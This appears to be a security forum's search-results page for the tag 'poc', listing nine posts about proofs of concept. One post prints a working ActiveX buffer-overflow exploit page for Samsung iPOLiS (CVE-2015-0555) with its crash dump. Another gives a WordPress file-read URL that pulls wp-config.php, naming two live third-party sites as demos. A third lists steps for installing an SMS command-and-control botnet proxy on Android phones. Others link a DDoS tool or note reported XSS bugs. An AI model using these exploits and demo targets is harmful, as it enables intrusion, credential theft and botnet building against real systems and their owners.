Showing results for tags 'poc'.

Found 9 results

  1. During a recent engagement, I discovered a machine that is running VMware ESXi 6.7.0. Upon inspecting any known vulnerabilities associated with this version of the software, I identified it may be vulnerable to ESXi OpenSLP heap-overflow (CVE-2021-21974). Through googling, I found a blog post by Lucas Leong (@_wmliang_) of Trend Micro’s Zero Day Initiative, who is the security researcher that found this bug. Lucas wrote a brief overview on how to exploit the vulnerability but shared no reference to a PoC. Since I couldn’t find any existing PoC on the internet, I thought it would be neat to develop an exploit based on Lucas’ approach. Before proceeding, I highly encourage fellow readers to review Lucas’ blog to get an overview of the bug and exploitation strategy from the founder’s perspective.
  2. [XSS] Apple.com Status: Reported PoC:
  3. Vuln.: [Cross site scripting] *.Telekom.de Status: Reported PoC:
  4. sleed

    AT&T

    Vuln.: [XSS] [Cross Site Scripting]: *.att.com Demo ^ Poc : Status: Reported
  5. <!--
     # Exploit Title: (0day)Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC (CVE-2015-0555)
     # Date: 22/02/2015
     # Exploit Author: Praveen Darshanam
     # Vendor Homepage: *https://www.samsung-security.com/Tools/device-manager.aspx
     # Version: Samsung iPOLiS 1.12.2
     # Tested on: Windows 7 Ultimate N SP1
     # CVE: 2015-0555
     -->
     <html>
     <!--
     Vulnerability found and PoC coded by Praveen Darshanam
     http://blog.disects.com
     CVE-2015-0555
     targetFile = "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx"
     prototype = "Function WriteConfigValue ( ByVal szKey As String , ByVal szValue As String ) As Long"
     memberName = "WriteConfigValue"
     progid = "XNSSDKDEVICELib.XnsSdkDevice"
     Operating System = Windows 7 Ultimate N SP1
     Vulnerable Software = Samsung iPOLiS 1.12.2
     CERT tried to coordinate but there wasn't any response from Samsung
     -->
     <head> Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC </head>
     <object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object>
     <script>
     var arg1 = "";
     var arg2="praveend";
     for (i=0; i<= 15000; i++) { arg1 += "A"; }
     target.WriteConfigValue(arg1 ,arg2);
     </script>
     </html>
     <!--
     #############Stack Trace####################
     Exception Code: ACCESS_VIOLATION
     Disasm: 149434 MOV AL,[ESI+EDX]

     Seh Chain:
     --------------------------------------------------
     1 647C7D7D mfc100.dll
     2 647D0937 mfc100.dll
     3 64E242CA VBSCRIPT.dll
     4 77B3E0ED ntdll.dll

     Called From             Returns To
     --------------------------------------------------
     XNSSDKDEVICE.149434     41414141
     41414141                414141
     414141                  3DA4C4
     3DA4C4                  mfc100.647790C1
     mfc100.647790C1         56746C75

     Registers:
     --------------------------------------------------
     EIP 00149434
     EAX 00003841
     EBX 00609FB0 -> 0015A564
     ECX 00003814
     EDX 00414141
     EDI 0000008F
     ESI 0000008F
     EBP 002BE5FC -> Asc: AAAAAAAAAAA
     ESP 002BE564 -> 0000000C

     Block Disassembly:
     --------------------------------------------------
     149423 XOR EDI,EDI
     149425 XOR ESI,ESI
     149427 MOV [EBP-8C],ECX
     14942D TEST ECX,ECX
     14942F JLE SHORT 00149496
     149431 MOV EDX,[EBP+8]
     149434 MOV AL,[ESI+EDX] <--- CRASH
     149437 CMP AL,2F
     149439 JNZ SHORT 00149489
     14943B MOV ECX,EBX
     14943D TEST ESI,ESI
     14943F JNZ SHORT 0014944D
     149441 PUSH 159F28
     149446 CALL 0014F7C0
     14944B JMP SHORT 00149476

     ArgDump:
     --------------------------------------------------
     EBP+8  00414141
     EBP+12 003DA4C4 -> Asc: defaultV
     EBP+16 647790C1 -> EBE84589
     EBP+20 FFFFFFFE
     EBP+24 646CBE5C -> CCCCCCC3
     EBP+28 0000001C

     Stack Dump:
     --------------------------------------------------
     2BE564 0C 00 00 00 00 E6 2B 00 B0 93 14 00 14 38 00 00 [................]
     2BE574 C4 A4 3D 00 41 41 41 41 41 41 41 41 41 41 41 41 [................]
     2BE584 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
     2BE594 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
     2BE5A4 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
     -->
     Source
  6. Found a while ago; I no longer have the PoC video, but it works. PoC: Reward: Hall Of Thanks: https://secure.sony.net/hallofthanks . My real name is Ionescu George; you can find me on the 2nd line. And of course the T-shirt (I think I've posted it before).
  7. POC: http://localhost/?sd_action=demo&file=wp-config.php DEMO: hXXP://satoriwheels.org/?sd_action=demo&file=wp-config.php hXXP://skyhighrank.com/?sd_action=demo&file=wp-config.php Source
  8. Malicious URL Shortener + HTML5 DDoS PoC. This project demonstrates the serious consequences of the Internet's increased reliance upon URL shorteners, as well as how easy it is to create an unwitting DDoS botnet using new HTML5 features without actually exploiting a single computer. It is intended only for demonstration and testing purposes; if you target a site that is not yours, you are responsible for the consequences. Download: http://d0z-me.googlecode.com/files/d0z-me-0.2.tar.gz
  9. To avoid detection, this proof-of-concept code utilizes the Short Messaging Service (SMS) as a command & control channel. This adds fault tolerance because, if a smartphone is not available on the GSM network due to being powered off or out of service range, when an SMS message arrives for delivery, the message is queued and delivered by the network. Download the POC code from Here. Compiling instructions are simple and straightforward. Please follow these:
       • Compile with arm-gcc with the -static flag set
       • Copy to anywhere on the underlying OS that is writable (/data/ is good).
       • Rename /dev/smd0/ to /dev/smd0real/
       • Start the bot application
       • Kill the radio application (ps | grep rild)
       • The radio will automatically respawn and now the bot proxy will be working
     The PoC code for smartphone botnet C&C over SMS was presented at the ShmooCon held in January 2011. It seems that the author also has it working for the iPhone platform! For sanity purposes, the PoC code has payloads aka commands removed. So what you see in the demo video will need to be added manually. It however does include logging and a local open port for testing to make developing your own payloads easier! Demo video here Source: SomeKnowledge.tk